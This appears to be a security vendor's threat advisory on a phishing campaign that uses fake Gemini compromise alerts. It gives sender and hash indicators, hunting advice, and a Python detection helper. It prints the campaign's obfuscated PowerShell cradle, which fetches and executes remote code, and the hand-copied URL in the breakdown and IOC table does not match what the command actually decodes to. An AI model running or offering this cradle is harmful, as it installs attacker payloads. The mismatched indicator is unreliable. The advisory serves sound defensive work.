Our Security Operations Center (SOC) recently identified a new phishing campaign targeting users with fake Gemini security alerts. The attack tricks recipients into executing a malicious PowerShell command, which likely installs malware or harvests credentials. This was detected through our Abusebox service, powered by Cofense, which analyzes user-reported phishing emails and suspicious attachments.
Phishing Email Details
Subject: Your Gemini May Be Compromised – [Target’s Last Name] Secure It Immediately
Sender: Terencio Munchausen <cvogkuhpeggiviiln@outlook[.]com>
Attachment: [Target’s Last Name].pdf
Malicious URL: https://shortl[.]at/LYSYr (Disabled, destination unknown)
File Hash: 83988f6bd34a421e2e68467a66f387b26e816cb504af415c5ccd21694103b922
Attack Flow
1) User receives a phishing email claiming an unauthorized login attempt on their Gemini AI account.
2) The email urges immediate action, instructing the user to run a PowerShell command to “secure their system.”
3) The command executes a hidden PowerShell script, which downloads content from a shortened URL:
powershell -w hidden -c "$g=('rSYLT/ta.lrutrohs//:sptth'[24..0] -join ''); iwr $g|iex"
What This Command Does (Step-by-Step Breakdown)
1) ('rSYLT/ta.lrutrohs//:sptth'[24..0] -join '')
a) Indexing the string from position 24 down to 0 and joining the characters reverses it, reconstructing the URL (https://shortl[.]at/LYSYr) only at run time so that scanners matching the plain URL string do not see it.
2) $g = ('rSYLT/ta.lrutrohs//:sptth'[24..0] -join '')
a) Stores the deobfuscated URL into variable $g.
3) iwr $g | iex
a) iwr (Invoke-WebRequest) fetches the script from the shortened URL.
b) iex (Invoke-Expression) executes whatever is downloaded.
Why This Is Dangerous
1) User-Triggered Malware Execution – The attack bypasses traditional security because the user manually runs the malicious command.
2) Obfuscation via String Reversal – Security tools scanning for specific URLs might miss this due to the reversed string.
3) Shortened Link Masking – Attackers use a URL shortener to hide the final payload, making detection and investigation difficult.
Indicators of Compromise (IOCs)
INDICATOR | DESCRIPTION
Email Sender | Terencio Munchausen <cvogkuhpeggiviiln@outlook[.]com>
File Hash | 83988f6bd34a421e2e68467a66f387b26e816cb504af415c5ccd21694103b922
Shortened URL | https://shortl[.]at/LYSYr (Now inactive)
PowerShell Command | powershell -w hidden -c "$g=('rSYLT/ta.lrutrohs//:sptth'[24..0] -join ''); iwr $g|iex"
Fake Login Attempt Details (as claimed in the lure) | IP: 67.85.14.114 (Hamhung, North Korea)
Recommended Actions
FOR SECURITY TEAMS
1) Block the malicious PowerShell pattern at EDR/XDR level.
2) Hunt for execution of this PowerShell command (iwr | iex) on endpoints.
3) Blacklist the sender’s domain and inspect logs for similar messages.
4) Monitor network traffic for any outbound connections to shortened links.
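Added example, not code from the Cyderes advisory: a small Python helper that decodes the string-reversal idiom explained in the breakdown above and applies the iwr | iex hunting logic from step 2 to process command lines. The sample command lines and the regex patterns are my own constructed assumptions, not telemetry from the campaign.

```python
import re

# Constructed sample process-creation command lines (what EDR or Sysmon
# Event ID 1 records). The first is this campaign's cradle; the other two
# are benign look-alikes a rule must not flag.
SAMPLE_COMMAND_LINES = [
    "powershell -w hidden -c \"$g=('rSYLT/ta.lrutrohs//:sptth'[24..0] -join ''); iwr $g|iex\"",
    "powershell -c \"Get-Process | Sort-Object CPU -Descending\"",
    "powershell -c \"iwr https://updates.example.invalid/a.ps1 -OutFile a.ps1\"",
]

# Reversal idiom used here: a single-quoted literal indexed with a descending
# range and re-joined, e.g. 'abc'[N..0] -join ''
REVERSED_LITERAL = re.compile(
    r"'(?P<lit>[^']+)'\s*\[\s*(?P<hi>\d+)\s*\.\.\s*0\s*\]\s*-join\s*''", re.I)
# Download cradle: Invoke-WebRequest output reaching Invoke-Expression,
# piped (possibly through a variable, as with $g above) or nested.
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|invoke-webrequest)\b.*\|\s*(iex|invoke-expression)\b"
    r"|\b(iex|invoke-expression)\b\s*\(?\s*(iwr|invoke-webrequest)\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden\b", re.I)


def reverse_literal(literal: str, hi: int) -> str:
    """Replicate 'str'[hi..0] -join ''. PowerShell returns $null for an
    out-of-range index and -join drops it, so clamp rather than fail."""
    hi = min(hi, len(literal) - 1)
    return literal[hi::-1]


def analyze_command_line(cmdline: str) -> dict:
    """Findings a detection rule would attach to one process event."""
    decoded = [reverse_literal(m["lit"], int(m["hi"]))
               for m in REVERSED_LITERAL.finditer(cmdline)]
    cradle = DOWNLOAD_CRADLE.search(cmdline) is not None
    hidden = HIDDEN_WINDOW.search(cmdline) is not None
    return {
        "decoded_strings": decoded,  # reconstructed URLs for the IOC list
        "download_cradle": cradle,
        "hidden_window": hidden,
        # alert when a cradle is combined with either evasion trait
        "suspicious": cradle and (hidden or bool(decoded)),
    }


def hunt(cmdlines):
    """Return (cmdline, findings) for every event the rule alerts on."""
    return [(c, f) for c in cmdlines
            if (f := analyze_command_line(c))["suspicious"]]
```

Decoding the literal exactly as it appears in the command above yields shorturl[.]at/TLYSr, which is not the same as the hand-transcribed URL in the IOC table; when indicators are copied by hand, decode the captured command programmatically and block the decoded value.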
FOR END USERS
1) Never execute PowerShell commands from unsolicited emails.
2) Verify security alerts directly in the official Gemini/Google Security Dashboard.
3) Report suspicious emails to your SOC or IT security team immediately.
Final Thoughts
Threat actors continue to weaponize AI-related services to trick users into self-compromising actions. This campaign highlights the importance of phishing awareness and strict PowerShell execution policies in enterprise environments.
Cyderes’ Abusebox service will continue tracking and mitigating these evolving tactics. If you suspect similar threats in your environment, reach out for incident response support.